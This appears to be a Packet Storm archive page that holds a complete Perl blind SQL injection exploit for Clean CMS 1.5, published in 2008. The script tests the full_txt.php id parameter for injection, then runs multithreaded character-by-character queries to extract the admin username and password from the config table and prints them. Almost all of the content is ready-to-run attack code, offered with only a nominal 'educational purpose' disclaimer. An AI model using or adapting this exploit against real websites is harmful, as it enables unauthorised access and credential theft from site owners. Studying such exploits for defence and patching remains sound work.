exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cleancms-blindsql.txt

cleancms-blindsql.txt
Posted Nov 25, 2008
Authored by JosS | Site spanish-hackers.com

Clean CMS version 1.5 blind SQL injection exploit that makes use of full_txt.php.

tags | exploit, php, sql injection
SHA-256 | 1d07d146274956fc37c78422fdbbf53a198a778bc4080777929e0555bbbfa213

cleancms-blindsql.txt

Change Mirror Download
# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
# url: http://www.4yoursite.nl/script_clean_cms.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com && spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Hack0wn :D

my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 32 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;


use LWP::UserAgent ;

sub _HELP_AND_EXIT
{
die "

./$0 -u <url> -p <pattern>

Options:
-u <url> Ex: http://localhost/full_txt.php?id=19
-p <pattern> HTML pattern.

Other:
-t <#> Threads, default '$DEFAULT_THREADS'.
-l <#> Maximum table name length '$MAX_FIELD_LENGTH'.
-T <#> Timeout.
-h Help (also with --help).

Example:

./$0 -u \"http://localhost/full_txt.php?id=19\" -p Concurso

" ;
}


my ($p, $w) = ({ @ARGV }, { }) ;

map {
&_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
} keys %$p ;

map {
die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
} qw/-u -p/ ;

$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;

map {
warn "[i] Getting default: $_ $w->{ $_ }\n" ;
} sort keys %$w ;

( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;




sub _START_WORK
{
my $p = shift ;

my $position = 1 ;

pipe(R, W) ;
pipe(Rs, Ws) ;
autoflush STDOUT 1 ;

my $sql_message = '' ;
my $msg = '' ;
my @pid ;

while( $position <= $p->{'-l'} )
{
my $cf ;
unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
push(@pid, $cf) ;

my $count = 0 ;
my $can_exit ;
my $char_printed ;

while(<R>)
{
chomp ;
push(@pid, (split(/:/))[1] ) if /^pid/ ;

my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
$count++ if $pos == $position ;

print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;

if( $res eq 'yes' and $pos == $position ){
$char_printed = $can_exit = 1 ;
print Ws "STOP $position\n" ;
$sql_message .= chr( $ascii ) ;
}

last if ( $can_exit or $count == @ascii );
}

map { waitpid($_, 0) } @pid ;

unless( $char_printed )
{
if( $EXIT_IF_NO_CHAR )
{
warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ;
last ;
}
}

$position++ ;
}

print "[i] USER / PASSWORD:\n$sql_message\n" ;

}

sub _CHECKING
{
my ($p, $position) = @_ ;
my $counter = 0 ;
my $stop_position ;

foreach my $ascii ( @ascii )
{
$counter++ ;

if( $counter % $p->{'-t'} == 0 )
{
my $stop_position ;
eval
{
$SIG{'ALRM'} = sub { die "non_stop\n" } ;
alarm $DEFAULT_THREADS_TIME ;
my $line = <Rs> ;
$stop_position = (split( / /, $line))[1] ;
alarm 0 ;
} ;

if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
}

unless(my $pid = fork )
{
print Ws "pid:$pid\n" or die ;


my $url = $p->{'-u'} .
' AND ascii(substring((SELECT CONCAT(admin_name,0x202f20,admin_pass) FROM config LIMIT 0,1),' . $position . ',1))='. $ascii ;

my $ua = LWP::UserAgent->new ;
$ua->timeout( $p->{'-T'} ) ;

my $content ;
while( 1 )
{
last if $content = $ua->get( $url )->content ;
}

( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;

exit( 0 ) ;
}

}
}



sub _IS_VULN
{
my $p = shift ;

my $ua = LWP::UserAgent->new ;
$ua->timeout( $p->{'-T'} ) ;

my ( $one, $two ) = (
$ua->get( $p->{'-u'}." AND 1=1")->content ,
$ua->get( $p->{'-u'}." AND 1=2")->content ,
) ;

return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
}

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close